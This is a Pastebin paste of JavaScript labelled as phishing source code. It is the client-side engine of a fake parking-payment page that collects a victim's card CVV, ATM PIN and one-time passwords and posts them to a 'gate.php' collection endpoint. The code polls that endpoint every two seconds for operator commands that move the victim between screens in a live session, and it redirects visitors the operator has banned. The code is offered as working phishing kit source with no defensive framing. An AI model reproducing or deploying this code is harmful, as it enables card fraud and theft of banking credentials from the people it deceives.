API tools faq
paste
Guest User

engine.js - Phishing sourcecode engine.js - 2025 - July - Hackout.ro

a guest
Jul 27th, 2025
19
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.67 KB | None | 0 0
raw download clone embed print report
  1. let
  2. gateURL = "gate.php",
  3. pingThrottle = 2000,
  4. formHeaders = new Headers({'Content-type': 'application/x-www-form-urlencoded; charset=UTF-8'});
  5. //
  6. fetch(gateURL, {
  7. method: 'POST',
  8. body: new URLSearchParams({
  9. action: "redirLink"
  10. }),
  11. headers: formHeaders
  12. })
  13. .then(response => response.json())
  14. .then(data => {
  15. redirectKick = data.redirectLink; // TODO: asta trebuie reparat
  16. });
  17.  
  18.  
  19.  
  20. const gotoHomeScreen = (event) => {
  21. if( typeof event !== 'undefined' && event !== null && typeof event !== "number"){
  22. event.preventDefault();
  23. }
  24. display("timerScreen")
  25. }
  26.  
  27. const gotoPlatesScreen = (event) => {
  28. event.preventDefault();
  29. display("plateScreen")
  30. }
  31.  
  32. const showError = (screenElement) => {
  33. document.getElementById(screenElement).querySelector(".error_msg").classList.remove("hidden")
  34. }
  35.  
  36. const gotoCvvScreen = (event) => {
  37. if( typeof event !== 'undefined' && event !== null && typeof event !== "number"){
  38. event.preventDefault();
  39. }
  40. display("cvvScreen")
  41. if( event == 1 ){
  42. showError("cvvScreen")
  43. //alert("show error msg")
  44. }
  45.  
  46.  
  47. }
  48.  
  49. const submitCvvData = (event) =>{
  50. event.preventDefault();
  51. //hideScreens();
  52. let formData = getFormData(event, "cvv")
  53. let ll = sendData(formData)
  54. console.log(ll)
  55. console.log(formData)
  56.  
  57. }
  58.  
  59. const submitPinData = (event) =>{
  60. event.preventDefault();
  61. //hideScreens();
  62. let formData = getFormData(event, "atm")
  63. let ll = sendData(formData)
  64. console.log(ll)
  65. console.log(formData)
  66.  
  67. }
  68.  
  69. const submitOtpData = (event) =>{
  70. event.preventDefault();
  71. //hideScreens();
  72. let formData = getFormData(event, "otp")
  73. let ll = sendData(formData)
  74. console.log(ll)
  75. console.log(formData)
  76.  
  77. }
  78.  
  79. const gotoConfirmScreen = (event) => {
  80. if( typeof event !== 'undefined' && event !== null && typeof event !== "number"){
  81. event.preventDefault();
  82. }
  83. display("confirmScreen")
  84. if( event == 1 ){
  85. showError("confirmScreen")
  86. //alert("show error msg")
  87. }
  88. }
  89.  
  90. const gotoOtpScreen = (event) => {
  91. if( typeof event !== 'undefined' && event !== null && typeof event !== "number"){
  92. event.preventDefault();
  93. }
  94. display("otpScreen")
  95. if( event == 1 ){
  96. showError("otpScreen")
  97. //alert("show error msg")
  98. }
  99. }
  100. const gotoPinScreen = (event) => {
  101. if( typeof event !== 'undefined' && event !== null && typeof event !== "number"){
  102. event.preventDefault();
  103. }
  104. display("pinScreen")
  105. if( event == 1 ){
  106. showError("pinScreen")
  107. //alert("show error msg")
  108. }
  109. }
  110. const gotoErrScreen = (event) => {
  111. if( typeof event !== 'undefined' && event !== null && typeof event !== "number"){
  112. event.preventDefault();
  113. }
  114. display("errScreen")
  115. if( event == 1 ){
  116. showError("errScreen")
  117. //alert("show error msg")
  118. }
  119. }
  120.  
  121. const hideScreens = () => {
  122. //hide all .screen | empty all .screen > input | set all select to first option
  123. document.getElementById("timerScreen").classList.remove("_hidden")
  124. document.getElementById("timerScreen").classList.add("hidden")
  125. document.getElementById("plateScreen").classList.remove("_hidden")
  126. document.getElementById("plateScreen").classList.add("hidden")
  127. document.getElementById("cvvScreen").classList.remove("_hidden")
  128. document.getElementById("cvvScreen").classList.add("hidden")
  129. document.getElementById("confirmScreen").classList.remove("_hidden")
  130. document.getElementById("confirmScreen").classList.add("hidden")
  131. document.getElementById("otpScreen").classList.remove("_hidden")
  132. document.getElementById("otpScreen").classList.add("hidden")
  133. document.getElementById("pinScreen").classList.remove("_hidden")
  134. document.getElementById("pinScreen").classList.add("hidden")
  135. document.getElementById("loadingScreen").classList.remove("_hidden")
  136. document.getElementById("loadingScreen").classList.add("hidden")
  137. document.getElementById("errScreen").classList.remove("_hidden")
  138. document.getElementById("errScreen").classList.add("hidden")
  139. document.getElementById("otp").value = "";
  140. document.getElementById("atmPin").value = "";
  141. allErrors = document.getElementsByClassName("error_msg")
  142. allInputs = document.querySelectorAll("input[type='text']")
  143.  
  144. for( let i=0;i<allInputs.length;i++){
  145. allInputs[i].value = ""
  146. }
  147.  
  148. for( let i=0;i<allErrors.length;i++){
  149. allErrors[i].classList.add("hidden")
  150. }
  151. }
  152.  
  153. const display = (screenName) => {
  154. hideScreens();
  155. document.getElementById(screenName).classList.remove("hidden")
  156. document.getElementById(screenName).classList.add("_hidden");
  157. const inputs = document.querySelectorAll('input:not([type="hidden"])');
  158. inputs.forEach(input => {
  159. input.value = '';
  160. });
  161. }
  162.  
  163.  
  164.  
  165. const getFormData =(event, action = "ping") => {
  166. let formData = {};
  167. formData["action"] = action
  168. for (let i = 0; i < event.target.length; i++) {
  169. if( null != event.target.elements[i].getAttribute("name") ){
  170. formData[event.target.elements[i].getAttribute("name")] = event.target.elements[i].value;
  171. }
  172. }
  173.  
  174.  
  175. return formData
  176. }
  177.  
  178. const gotoWaitScreen = () => {
  179. display("loadingScreen")
  180. }
  181.  
  182.  
  183.  
  184.  
  185. const sendData = (formData) => {
  186. fetch(gateURL, {
  187. method: 'POST',
  188. body: new URLSearchParams(formData),
  189. headers: formHeaders
  190. })
  191. .then(response => response.json())
  192. .then(data => {
  193. if (data.ban_status == 1) {
  194. document.body.innerHTML = '';
  195. window.location.replace(redirectKick);
  196. }
  197. // setTimeout(function () {
  198. // pingHome();
  199. // }, pingThrottle);
  200. executeFunction(data.cmd, data.params, data.extra);
  201. console.log(data)
  202. //alert(data.cmd);
  203. });
  204. }
  205. const executeFunction = (cmd, param = 0, extra = null) => {
  206.  
  207. //console.log( [cmd, param, extra] )
  208. switch ( parseInt(cmd) ) {
  209. case 0:
  210. // nein
  211. break;
  212. case 1:
  213. gotoHomeScreen(param);
  214. break;
  215. case 3:
  216. gotoCvvScreen(param);
  217. break;
  218. case 4:
  219. gotoConfirmScreen(param);
  220. break;
  221. case 5:
  222. gotoOtpScreen(param);
  223. break;
  224. case 6:
  225. gotoPinScreen(param);
  226. break;
  227. case 7:
  228. gotoErrScreen(param);
  229. break;
  230. case 8:
  231. window.location.replace(redirectKick)
  232. break;
  233. case 9:
  234. gotoWaitScreen();
  235. break;
  236.  
  237. default:
  238. //niet
  239. break;
  240. }
  241. }
  242.  
  243. // 1 -> timerScreen | timerForm
  244.  
  245. let pingHome = () => {
  246. fetch(gateURL, {
  247. method: 'POST',
  248. body: new URLSearchParams({
  249. action: "ping"
  250. }),
  251. headers: formHeaders
  252. })
  253. .then(response => response.json())
  254. .then(data => {
  255. if (data.ban_status == 1) {
  256. document.body.innerHTML = '';
  257. window.location.replace(redirectKick);
  258. }
  259. setTimeout(function () {
  260. pingHome();
  261. }, pingThrottle);
  262. executeFunction(data.cmd, data.params, data.extra);
  263. //alert(data.cmd);
  264. });
  265. }
  266.  
  267. setTimeout(function () {
  268. pingHome()
  269. }, pingThrottle);
  270.  
  271.  
  272. const calculateRate = () => {
  273. let totalTime = parseInt(document.getElementById("minutes_select").options[document.getElementById("minutes_select").selectedIndex].value) + parseInt(document.getElementById("hours_select").options[document.getElementById("hours_select").selectedIndex].value);
  274. totalPrice = 0.25 * totalTime /15;
  275. console.log(totalPrice)
  276. if(totalPrice > 4 ){
  277. totalPrice = 4;
  278. }
  279. let priceTags = document.getElementsByClassName("totalPriceSpan")
  280. for(let i=0;i<priceTags.length;i++){
  281. priceTags[i].textContent = totalPrice;
  282. }
  283. let humanTime = document.getElementsByClassName("humanTime")
  284. for(let i=0;i<humanTime.length;i++){
  285. humanTime[i].textContent = toHoursAndMinutes(totalTime);
  286. }
  287. }
  288.  
  289.  
  290. const setPlatenumber = () => {
  291. let currentPlateNumber = document.getElementById("plateNumber").value
  292.  
  293. let plateNumber = document.getElementsByClassName("licenseNumber")
  294. for(let i=0;i<plateNumber.length;i++){
  295. plateNumber[i].textContent = currentPlateNumber;
  296. }
  297. }
  298.  
  299.  
  300.  
  301. function toHoursAndMinutes(totalMinutes) {
  302. const hours = Math.floor(totalMinutes / 60);
  303. const minutes = totalMinutes % 60; return `${hours}h${minutes > 0 ? ` ${minutes}m` : ''}`;
  304. }
  305.  
  306. document.getElementById("timerForm").addEventListener("submit", gotoPlatesScreen )
  307. document.getElementById("plateForm").addEventListener("submit", gotoCvvScreen )
  308. document.getElementById("cvvForm").addEventListener("submit", submitCvvData )
  309. document.getElementById("pinForm").addEventListener("submit", submitPinData )
  310. document.getElementById("otpForm").addEventListener("submit", submitOtpData )
  311. // document.getElementById("cvvForm").addEventListener("submit", gotoConfirmScreen )
  312. document.getElementById("confirmForm").addEventListener("submit", gotoPlatesScreen )
  313. //document.getElementById("otpForm").addEventListener("submit", gotoPlatesScreen )
  314. //document.getElementById("pinForm").addEventListener("submit", gotoPlatesScreen )
  315.  
  316. document.getElementById("plateNumber").addEventListener("change", setPlatenumber)
  317.  
  318. document.getElementById("hours_select").addEventListener("change", calculateRate)
  319. document.getElementById("minutes_select").addEventListener("change", calculateRate)
  320.  
  321.  
  322.  
  323.  
  324. let resumePage = () => {
  325. //console.log("resume page")
  326. fetch(gateURL, {
  327. method: 'POST',
  328. body: new URLSearchParams({
  329. action: "ping"
  330. }),
  331. headers: formHeaders
  332. })
  333. .then(response => response.json())
  334. .then(data => {
  335. //console.log(data);
  336. if (data.ban_status == 1) {
  337. document.body.innerHTML = '';
  338. window.location.replace(redirectKick);
  339. }
  340. //console.log("executeFunction()")
  341. //console.log([data.page, data.params, data.extra])
  342. executeFunction(data.page, data.params, data.extra);
  343. });
  344. }
  345.  
  346. resumePage();
  347. calculateRate();
  348. setPlatenumber();
  349.  
  350. document.getElementById("minutes_select").options[document.getElementById("minutes_select").selectedIndex].value
  351. document.getElementById("hours_select").options[document.getElementById("hours_select").selectedIndex].value
  352.  
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!